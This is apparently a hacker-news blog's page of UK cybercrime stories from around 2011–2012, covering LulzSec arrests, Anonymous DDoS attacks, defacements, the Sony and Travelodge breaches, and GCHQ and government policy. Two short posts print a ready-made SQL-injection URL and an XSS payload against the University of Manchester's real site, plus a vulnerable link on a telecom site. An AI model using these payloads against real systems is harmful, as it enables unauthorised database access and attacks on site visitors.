Showing posts sorted by relevance for query UK. Sort by date Show all posts
Showing posts sorted by relevance for query UK. Sort by date Show all posts

41 Web Sites (Including UK Govt) Defaced By Syrian Electronic Army

UK Announces Plans for ‘Cyber Reserve’ Online Crime Defence Force

UK Govt. Announces Plans for ‘Cyber Reserve’ Online Crime Defense Force

Earlier this week, the UK government announced that it was planning on setting up a ‘cyber reserve’ force aimed at dealing with security threats brought about by online crime. The proposed force will be run by the country’s ministry of defense and is going to allow the armed forces to draw on the nation’s computer-related talents in order to ward off online attacks and stem the tides of cyber crime. Minister for the Cabinet Office Francis Maude claims that ‘critical’ work is required in order to combat online lawbreaking. He says that nine tenths of large British corporations and three quarters of small British businesses have reported experiencing a cyber breach within the last year, meaning that this force has now become a necessity.

Cyber Crime in the UK
Research conducted by a team of academics recruited by the UK Ministry of Defense earlier this year concluded that the country spends a billion US dollars per year on protecting against and cleaning up after instances of cyber crime. This includes the cost of measures taken to safeguard bank account security and reduce computer-related fraud, the money forked out by businesses purchasing anti-virus software and the cost of removing viruses from computers. In addition to criminals, terrorists and rogue states have also targeted computers in the UK, meaning that it is not difficult to see why the country would consider setting up such a force.

More Students Trained in Tackling Cyber Crime Needed
Maude has promised to make the UK one of the safest places in the world to conduct online business. He added that further details of the ‘cyber reserve’ plans would be revealed in 2013 and said that British government agencies and departments are working with professional bodies in order to ensure that the consideration of internet security becomes an integral component of corporate governance and the risk management process. He stated that UK officials want more students in the country trained in the skills required for tackling cyber crime and pointed out that the nation’s ministry of defense is examining new methods for attracting talented cyber security specialists, as they are required for critical areas of work.

Cyber-Spying by Hostile Nations
The UK Ministry of Defence’s announcement came in the wake of revelations that hostile foreign states had carried out ‘mapping’ of the systems that control the country’s power and water supplies. Officials refused to name the nations that were believed to have carried out this mapping but there have been reports in the United States that China and Russia have conducted similar reconnaissance exercises there, which suggests that they could be the countries that are responsible for this cyber-spying activity. With this in mind, it is little wonder the UK is stepping up its security, as it wishes to safeguard vital information.

Cyber Confidence Tracker
Francis Maude stated that the increasing number of threats posed to the UK’s online security is partly down to the growth of the internet economy. He said that the country’s government cannot take sole responsibility for fighting cyber crime and emphasized the fact that individuals and businesses would also have to play their part. Next spring the UK will be taking steps to improve online security for consumers and small businesses. The nation plans on launching a ‘cyber confidence tracker’, which will keep tabs on online behaviors and perceptions about internet security in an effort to ensure that the advise that they are delivering to the public about this subject is being conveyed in the best possible way.

Implications
It appears that the UK is now taking the threat of cyber attack extremely seriously, which it is wise to do considering the increasing trend of nations targeting the infrastructures of those that they are hostile towards via the internet. This is a sign that the web is becoming the new battleground in the international struggle for power. The full extent of the country’s plans for its ‘cyber reserve’ are not yet known. It is also questionable whether it will be used solely for defense purposes. Espionage is no longer dominated by spies being physically placed in another country. It is now evidently moving online, meaning that countries are being forced to adapt and develop cyber spies of their own.


Special article by 
Evelyn Anderson of International Business and Journalism
Guest Editor VOGH








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

GCHQ Awarded 8 UK Universities “Academic Centre of Excellence in Cyber Security Research”

GCHQ Awarded 8UK Universities “Academic Centre of Excellence in Cyber Security Research”
UK is putting more attention on cyber-security. Last Monday GCHQ, the UK's signals intelligence organisation, awarded eight UK universities the 'Academic Centre of Excellence in Cyber Security Research', laying the ground for deeper relationships between the institutions and the government agency. These top eight universities of UK will work closely with GCHQ as centres of excellence for cybersecurity research.
According to GCHQ official release:-
The first eight UK universities conducting world class research in the field of cyber security have been awarded “Academic Centre of Excellence in Cyber Security Research” status by GCHQ in partnership with the Research Councils’ Global Uncertainties Programme (RCUK) and the Department for Business Innovation and Skills (BIS). We hope other universities will also become Centres in the near future as part of an ongoing process.
The Centres of Excellence will benefit the UK by:
  • Enhancing the UK’s cyber knowledge base through original research
  • Providing top quality graduates in the field of cyber security
  • Supporting GCHQ’s cyber defence mission
  • Driving up the level of innovation
  • The Centres of Excellence will help make the UK government, business and consumers more resilient to cyber attack by extending knowledge and enhancing skills in cyber security.
The eight Universities chosen as Centres of Excellence in Cyber Security Research are:
  • University of Bristol    
  • Imperial College London
  • Lancaster University    
  • University of Oxford
  • Queen’s University Belfast    
  • Royal Holloway, University of London
  • University of Southampton    
  • University College London
These Centers will be the first to attain Academic Centre of Excellence in Cyber Security Research status and will benefit from:
  • Closer collaboration with GCHQ, the UK Cyber Community and industry
  • Partnership endorsement in associated publications and prospectuses
  • Better understanding of Government and industrial cyber issues
  • Helping to formulate the future Cyber Security research agenda
  • Extra funding opportunities and £50,000 capital investment
Francis Maude, the minister for cybersecurity, said "These first eight centers will play a vital role in boosting research, expanding our cyber skills base and fostering innovation in the field" He added "We want to make the UK one of the most secure places in the world to do business, by investing in the best expertise to keep pace with technological change." The centres will open for business on 1 July 2012 for five years, during which time GCHQ hopes other universities will beef up their cybersecurity capabilities to meet the criteria for being recognised as centres of excellence.


-Source (GCHQ)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

13 site been hacked by SHAK (ADMIN PCA)

UK Cops Gave Warning To hacktivist Via Twitter


After arresting several suspected members of high-profile hackers’ groups, the UK police issued their latest warning to other hackers – via a tweet.
In a message on its Twitter account, the UK Metropolitan Police reminded people against computer misuse, adding the probe into the criminal activity of hacktivist groups continues.
 
"The investigation into the criminal activity of so-called ‘hacktivist’ groups #Anonymous and #LulzSec continue(s)," it said.

 
A link on the tweet led to a longer statement, where the Metropolitan Police reiterated anyone considering accessing a computer without authority risk imprisonment.
Hacker groups had taken to using Twitter to inform the public of their latest acts.
Under UK law, “it is an offence if a person acts from within the UK upon a computer anywhere else in the world. It is also an offence if someone anywhere else in the world to criminally affect a computer within the UK," the police tweet said.
The tweet also said UK law penalizes unauthorized access to personal accounts, Distributed Denial of Service (DDOS) Attacks and intrusive hacks where data is taken or systems changed.
"Other jurisdictions have similar law," it said in the extended tweet.
In past weeks, UK police had arrested “Topiary," the suspected spokesman of hacker group Lulz Security, which had joined forces with Anonymous to hack government and corporate sites.
But “Topiary" a.k.a. Jake Davis, 18, was released on bail after he was charged with five offenses relating to computer attacks and break-ins by LulzSec and Anonymous.
Anonymous had issued a press release to free “Topiary" and hinted at getting back at those who led to his arrest.
It called on its Anons in the UK "to revolt and wash this shame brought upon them by a band of traitors and bandits who sold out to Anonymous’ enemies and disparaged the sentiment of this noble, lulzy people."

The group also called on Anons "to revolt altogether to cleanse the world of the ProSec filth who spread mischief in the land."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Anonymous Engaged Cyber Attack To Bring Down British Prime Minister’s Office, Home Office & Ministry of Justice

Anonymous Engaged Massive Cyber Attack To Bring Down British Prime Minister’s Office, Home Office & Ministry of Justice 
 
One of the official twitter account of hacker collective Anonymous warned that they will engage cyber attack against the Govt of UK on 4th of April. The tweet said:- "EXPECT a DDOS (Distributed Denial of Service) every Saturday on the UK Government sites." As expected it happens hacktivist performs massive denial of service attacks multiple U.K. government websites over the country’s “draconian surveillance proposals” and “derogation of civil rights.” At the time of writing, the following websites are down: homeoffice.gov.uk (Home Office), number10.gov.uk (10 Downing Street - British Prime Minister’s Office), and justice.gov.uk (Ministry of Justice). A message on the site said the page was currently unavailable homeoffice.gov.uk "due to a high volume of traffic", suggesting a denial of service attack had been perpetrated. A message on Twitter claiming to be from Anonymous, a loosely organised group of hackers, said the action was "for your draconian surveillance proposals". The apparent attack came after it emerged last week that the Government was planning a massive expansion of its powers to monitor the email exchanges and website visits of every person in the UK. Under legislation expected in next month's Queen's Speech, internet companies will be instructed to install hardware enabling GCHQ - the Government's electronic "listening" agency - to examine "on demand" any phone call made, text message and email sent, and website accessed, in "real time" without a warrant.
A Home Office spokesman said: "We are aware of some reports that the Home Office website may be the subject of an online protest. We have put all potential measures in place and will be monitoring the situation very closely." The Home Office added that if a successful denial of service attempt did occur tonight, it would "liaise with the technical team and update as necessary".


-Source (The Huffington Post & BBC)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

NASA & UFO Hacker Gary McKinnon Will Not Face Prosecution in UK

NASA & UFO Hacker Gary McKinnon Will Not Face Prosecution in UK

Infamous NASA hacker Gary McKinnon who broke into US government computer system, while hunting for evidence of UFOs and fought a long fight against extradition, has been told that he will now not face prosecution in the UK. After discussing the case with US Department of Justice and the police, The Crown Prosecution Service (CPS) has decided the appropriate jurisdiction for the McKinnon case to be heard is the US. According to Karen Todner, McKinnon's solicitor, the decision on Friday is an "interesting" one given that he was first arrested and questioned by UK police.

The reasons for that decision were:
  1. The harm occurred in the US - the activity was directed against the military infrastructure of the US;
  2. An investigation had already been launched in the US;
  3. There were a large number of witnesses, most of whom were located in the US;
  4. All of the physical evidence (with the exception of Mr McKinnon's computer) was located in the US;
  5. The US prosecutors were able to bring a case that reflected the full extent of Mr McKinnon's alleged criminality; and
  6. The bulk of the unused material was located in the US. Given the nature of the offences, this inevitably included highly sensitive information and the US courts were best placed to deal with any issues arising in relation to this material.

In a statement, the CPS's Director of Public Prosecutions (DPP), Kier Starmer QC, and Mark Rowley, Assistant Commissioner of the Metropolitan Police Service, said that they had convened a joint panel to discuss the issue and decide whether a new criminal investigation should take place. They decided that the original reasoning for the trial being held in the US still held, and looked into the possibility of holding the trial in the UK. This would have involved transferring witnesses and sensitive physical evidence to the UK. The panel consulted with the US Department of Justice as to whether this would be possible, given that they believed that "the prospects of a conviction against Mr McKinnon, which reflects the full extent of his alleged criminality, are not high".
According to the statement, the US authorities "indicated to us that they would be willing to co-operate with a prosecution in England and Wales if that would serve the interests of justice." However, the US authorities did not feel that transferring all the witnesses and evidence to the UK would be in that interest, given the panel's representations. The statement goes on to say: "That is a decision the US authorities are fully entitled to reach and we respect their decision." On that basis, the panel concluded that a new criminal investigation should not be started and the Assistant Commissioner accepted that advice.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Taith North Wales Transport & Travel Planning of UK Govt Hacked By Pakistani Hacker

Taith North Wales Transport & Travel Planning (Govt of UK), Few Other High Profile Websites Hacked By 'KHAN' (Pakistani Hacker)
A hacker from Pakistan going by the nick name of 'KHAN' has targeted a several high valued website of United Kingdom. The cyber attack happened few days ago where 'Khan' has hacked into the websites of Taith North Wales Transport and Travel Planning of UK Government. Taith is a joint committee of six county authorities from North Wales that handles transport and travel planning.
Sources revealed that the hacker belongs from Italy has managed to gain access into one the server of UK govt, and thus he successfully hack and change the index page with customized message saying- "today i am again with same message uk goverment deciding Ban Hijab for muslim womens what the hell is this! when your womens wear underware and come out of home beaches, road, you said this is freedom ? this is no problem ? but when our ladies , sisters , mothers wear hijab you said this is problem . so you call this justice ? i will fight for our right like a legend till i die .. We Want Freedom For Our Religion. You can kill us but cant kill our idea!" The hacker also claimed that not only defacement, but also he managed to breach the database of  the website. As soon as the security breach get spotted the authorities of Taith North Wales Transport Dept, took immediate steps and restored the site. While the time of writing this news, Taith Transportation portal has come back to online to its normal format. Also in his deface page 'Khan' took the responsibility of intrusion against Customs of Russia' official website. This slew of hacking rampage also affected several other high profile website of UK such as Hotel Black Boy Inn, Buckley Industry, Groes News, Spirit Models, Livetech, ByteBack Training & few more.


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

High Court Ordered ISP's To Block The Pirate Bay in U.K.

High Court Ordered ISP's To Block The Pirate Bay in U.K. 

Last month Microsoft has blocked Pirate Bay links in Windows Live Messenger, now the High Court ordered to strictly block Pirate Bay in U.K. Sky, Everything Everywhere, TalkTalk, O2 and Virgin Media and other ISP of UK must have to  prevent their users from accessing the site. A sixth ISP, BT, requested "a few more weeks" to consider their position on blocking the site. Pirate Bay is regarded as the world's largest bittorrent tracker & file shearing sites hosts links to download mostly pirated free music and video.
"Sites like The Pirate Bay destroy jobs in the UK and undermine investment in new British artists," the British Phonographic Industry (BPI) said. Chief executive of BPI Geoff Taylor said: "The High Court has confirmed that The Pirate Bay infringes copyright on a massive scale. Its operators line their pockets by commercially exploiting music and other creative works without paying a penny to the people who created them. 
"As a responsible ISP, Virgin Media complies with court orders addressed to the company but strongly believes that changing consumer behaviour to tackle copyright infringement also needs compelling legal alternatives, such as our agreement with Spotify, to give consumers access to great content at the right price." - said Virgin Media. 


-Source (BBC)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Three million PS3 users in danger of fraud


Gaming giant Sony has confirmed subscribers’ card details have been stolen in the world’s biggest online hacking.
Following the revelation that 77 million subscriber accounts on Sony’s PS3 network had been hacked into, three million Brits are now vulnerable to being victims of identity fraud scams.
Customers should keep a close eye on their account for any unusual activity
The data stolen by the hackers includes names, postal addresses (including postcode, city and country), dates of birth, online IDs, email addresses, online passwords and other log-in details.
Sony has confirmed that all credit card data on its systems was stored in encrypted form, which should limit its usefulness for financial fraud.
However, other user data, such as passwords and address details, was stored in plain text, and will be open to use by “phishers” and spammers.
Although it took Sony a week to admit the colossal breach of online security, bank industry body Financial Fraud Action UK (FFA UK) has issued an urgent alert to victims.
“There’s no need for customers to contact their bank or card company at this stage,” said a FFA UK spokesman.
“However, customers should continue to do what they should normally be doing: checking their statement and keeping a close eye on their account for any unusual activity. If they spot any, they should contact their bank or card company.”
One of the major worries for UK PS3 subscribers is that many customers use the same passwords for their PlayStation account as they do for other financial accounts. FFA UK recommends they should change these passwords as soon as possible.
Victims of hacking have also been warned to watch out for spam emails - “phishing” attacks - which are targeted attempts to acquire confidential information.
Phishers send out emails that look like a genuine communication from the recipient’s credit card company or bank, with the request they fill in an online form with personal information.
This information can then be used to open accounts in the victim's name, such as mobile phone contracts or utility services, or used to apply for credit cards and loans.
Fraudsters can also open bank accounts, apply for state benefits, order goods in someone else's name and obtain genuine legal documents such as passports, driving licences and birth, marriage and death certificates. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

19 Million+ UK Households Being Used As Cyber Weapon (Botnets)


You are also a cyber criminal. Don't get panic, we are sorry to say this for that is truth. An exclusive report is saying that more than a million households of UK is either used or misused as cyber weapons meainly Botnets.
Dutch researchers investigating ways to curtail the hijacking of domestic computers for criminal use, found that more than one million UK households’ PCs are linked to criminal networks known as ‘botnets’, which are groups of Internet-connected computers that have been compromised by a third party and put to malicious use. With around 6% of the UK’s 19m Internet households thought to be part of a botnet, this helps criminals spread spam around the Web more effectively, whilst it can also be used to attack websites and even garner bank details from the unsuspecting public.
The data was gathered from a number of different sources, though most emanated from what is known as ‘spam traps’, which are fake email addresses set up for the sole purpose of receiving junk mail. It’s thought that more than 90% of spam is sent through botnets, and it’s the Internet addresses on these botnets which are a good indicator of where the so-called ‘drone’ machines are located. The researchers then used the IP addresses of the machines that were sending the spam, and traced each one to an Internet Service Provider (ISP). And feeding into this was data about the Conficker botnet, which is thought to be one of the biggest examples of such a network, and incident reports from a computer security company called DShield. The UK figure is placed at number 19 in the top 20 nations with the biggest botnet problem, but it’s roughly in-line with the global average which sits at around 5-10% of domestic computers that are thought to be linked to botnets. Greece and Israel were way out on top, though, with around a fifth of all broadband subscribers thought to be unwittingly recruited into botnets. 
It goes without saying that the biggest ISPs have the biggest botnet problem. It has been figured out that the level of spam on BT’s network peaked at the end of July 2010, at which point more than 30m junk email messages were being sent each week.  

Here is a Statistic:- 


The good news, however, is that these figures have fallen sharply since then with a number of anti-cyber crime groups helping to bring down some of the biggest botnets. One takedown earlier this year saw spam fall massively overnight, when just an entire network, called Rustock, stopped sending junk.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

3 UK websites Hacked by CYB3r.Pr3dat0r of ICA & Team DNA StuXnet

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Vulnerability Found on UK Direct Telecom Website By Kheshav


Vulnerability found on UK Direct Telecom Website by kheshav. UK Direct Telecom provides Services like wireless-communication, rent of communication equipments.

Vulnerable Website:-
http://www.direct-telecom-svs.co.uk/index.php 

Vulnerable Link:-
http://www.direct-telecom-svs.co.uk/products.php?id=604

Database Back-end: MySQL 5.0.11
Web Technology: IIS6.0, ASP.NET, PHP 5.2.6
OS: Windows Server 2003
Database name: cmsdirect

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

vulnerability on university of manchester and university of liverpool's website

Multiple vulnerability found by Zero on the university of manchester and university of liverpool's website


University Of Manchester:- 
webiste: - http://www.manchester.ac.uk/
Vulnerability: - SQL-i & Non persistence XSS


Vulnerable Link(SQL-i):- http://www.manchester.ac.uk/aboutus/news/archive/list/?year=2011&month=-02+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables%20WHERE%20table_schema=database%28%29--


Vulnerable Link(XSS):- http://www.manchester.ac.uk/aboutus/search/index.htm?num=10&as_dt=i&oe=UTF8&ie=UTF8&access=p&filter=1&numgm=5&output=xml_no_dtd&client=MAN_aboutus_search&site=University&q=%3Cscript%3Ealert%28%22A%22%29%3C/script%3E

University Of Liverpool:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

20 Websites of UK Hacked By ShadY & Jaguar (Indian Hacker)


20 Websites of  UK hacked and defaced by ShadY & Jaguar (Indian Hacker). Previously Pakistani hackers are mainly targeting UK sites. But now it seem that the strategy has been changed, and now Indian hackers are also behind the UK cyber fence.

List of  Hacked Sites & Mirrors:-
http://pastebin.com/bJ3AXd7H




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

This Year PCEU Saved £140m



The UK cyber police have saved the country £140m this year, according to government figures.
The coppers at London's Metropolitan Police central e-crimes unit (PCEU) have made some big arrests in the last few months, including Lulzsec's Topiary and several people at the News of the World.
We expect that the £140m saved is not the result of people having no Sunday tabloid to buy however, but rather an accumulation of savings to businesses, banks and consumers. The Met said that its operational activity so far has completed 30 percent of a £504m "harm reduction target", which we expect is the police bureaucracy's term for 'goal'.
"The Police Central e-Crime Unit continues to take action in its continuing efforts to reduce the harm caused to the UK economy and to UK citizens by those making use of the internet to commit crime," said detective superintendent Charlie McMurdie of the PCEU.
"This initial result is only a small sample of the current investigations and interventions being conducted... the figure alone does not capture the other important benefits gleaned from the learning obtained from targeting the higher echelon of cyber criminals that we then share with our partners."
Perhaps the biggest savings came from Operation Pagode. This saw the Met break up an online crime forum that specialised in personal identity theft and allegedly saved some £84m.
It might be just a drop in the bucket, though. According to a government report released this Spring, cyber crime costs the UK around £27bn a year.


-News Source (The Inquirer)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

XSS in UK Gov sites found by Zero Cool

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Travelodge customer data stolen



Travelodge UK is investigating an apparent hacking attack on its customer database. The hotel chain issued a warning to users of its online service to be on the lookout for spam e-mails. Full details of the security breach were not immediately available. A spokesperson said it seemed that a limited number of people were affected. No financial information or payment details were stolen in the attack, according to Travelodge.
A letter to customers, signed by the company's chief executive Guy Parsons, contains little information about the nature of the leak, although it stresses that Travelodge had not sold user data to a third party. It also quotes the spam e-mail that some customers have received.
"Good day. Don't miss exciting career opening. The company is seeking for self-motivated people in United Kingdom to help us spread out our activity in the UK area," said the message.
The company promised to give further updates once is has completed an internal investigation.

This was the Letter send by the CEO of Travelodge, by stating that Customer Data has been stolen

Thursday 23rd June 2011 (3.00pm)
Dear Customer,
Our main priority is to ensure the security of our customers’ data, which is why I wanted to make you aware, that a small number of you; may have received a spam email via the email address you have registered with us.
Please be assured, we have not sold any customer data and no financial information has been compromised.
All financial data (including credit card information) is compliant with current best practice standards and is audited to PCI (Payment Card Industry) requirements.
The safety and security of your personal information is of the upmost importance to us and as a result we are currently conducting a comprehensive investigation into this issue.
If you receive an email similar to the one detailed below, please delete it as spam.
Good day. Don't miss exciting career opening. The company is seeking for self-motivated people in United Kingdom to help us spread out our activity in the UK area. Conditions: - Full age United Kingdom resident - Only basic knowledge of Internet & computer. - Free access to personal e-mail box - 2-3 free hours per day - Immediate replies on our written requests - good organizational skills. You can without problem connect our work with your primary activity. Brilliant income ability. Free training available. Applicants must be smart and commerce motivated. Working only some hours per day. Any person residing in the United Kingdom can be our representative. Our manager will contact you within few hours if you attracted. ---------------- Local News: from paris, with love who's the toast of the airport show.
If you have any questions regarding this matter please email: andrea@travelodge.co.uk. A further update will be given, when we have completed our investigation.
Guy Parsons
Chief Executive

-News Source (BBC)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

2 Hacker From UK Get Busted For Stealing Michael Jackson Back Catalog From Sony

2 Hacker From UK Get Busted For Stealing Michael Jackson Back Catalog From Sony

Two hacker from UK have allegedly been arrested for illegally downloading more than 50,000 tracks from Sony's collection of world's famous pop star Michael Jackson's back catalog. James Marks, 26 and from Daventry, and 25-year-old James McCormick from Blackpool, were arrested last May and are due to stand trial in January 2013.
Sony purchased the rights from the Jackson estate in 2010 for $200 million to complete 10 projects over seven years. The actual crime happened last April when the Sony PlayStation Network was hack and shut down for 23 days due to hackers breaching the company's servers. Personal data from about 77 million customers were compromised in the cyber attack, including names, home addresses, birthdays, usernames and passwords. Sony apologized to customers and offered free identity theft protection services.



-Source (BBC)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LulzSec Hacker Ryan Get Bail (He Was Behind The Attack Against CIA & SOCA)

LulzSec Hacker Ryan Get Bail (He Was Behind The Attack Against CIA & SOCA)
Two days ago an alleged  hacker has appeared in court accused of conspiring with three British teenagers to bring down the websites of the CIA and the UK's Serious Organized Crime Agency. Ryan Ackroyd, 25, appeared at Westminster Magistrates court in London on Friday charged with computer hacking offences for the so-called “hacktivist” group, LulzSec.
Ryan was also accused of attacks on the NHS and News International, publisher of the Sun, as well as police authorities in the UK and US. The Doncaster man is the last of four British males to appear in court in the UK in connection with attacks by LulzSec, a spin-off group linked to the hacking collective Anonymous.
He faces two counts of conspiring with Jake Davis, 18, Ryan Cleary, 19, and a 17-year-old boy, who cannot be named for legal reasons, to do “an unauthorised act with intent to impair or with recklessness as to impair the operation of a computer” between 1 February and 30 September 2011. 
He made no plea and was granted bail by Westminster magistrates until a hearing at Southwark Crown Court on 11 May. Mr Ackroyd is the last of four alleged members of LulzSec to appear in court. District judge Howard Riddle granted him bail until a plea and case management hearing at Southwark crown court on 11 May, on condition that he does not access or have in his possession any device that could access the Internet.
Earlier in 2011 Ryan also faced imprisonment and later released on bail. Court ordered him not to use Internet even Ryan was also banned from seeing his girlfriend alone by the court.  



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...